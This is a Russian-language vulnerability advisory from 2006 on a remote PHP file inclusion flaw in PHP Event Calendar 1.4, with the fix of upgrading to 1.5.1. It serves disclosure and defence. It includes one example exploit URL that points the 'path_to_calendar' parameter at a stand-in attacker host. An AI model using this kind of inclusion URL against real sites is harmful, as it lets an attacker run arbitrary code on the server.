PHP-инклюдинг в PHP Event Calendar

Дата публикации:
19.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
2661
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP Event Calendar 1.x
Уязвимые версии: PHP Event Calendar 1.4, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "path_to_calendar" в сценарии cl_files/calendar.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode

URL производителя: www.softcomplex.com/products/php_event_calendar/

Решение: Установите последнюю версию (1.5.1) с сайта производителя.

Ссылки: PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

или введите имя

CAPTCHA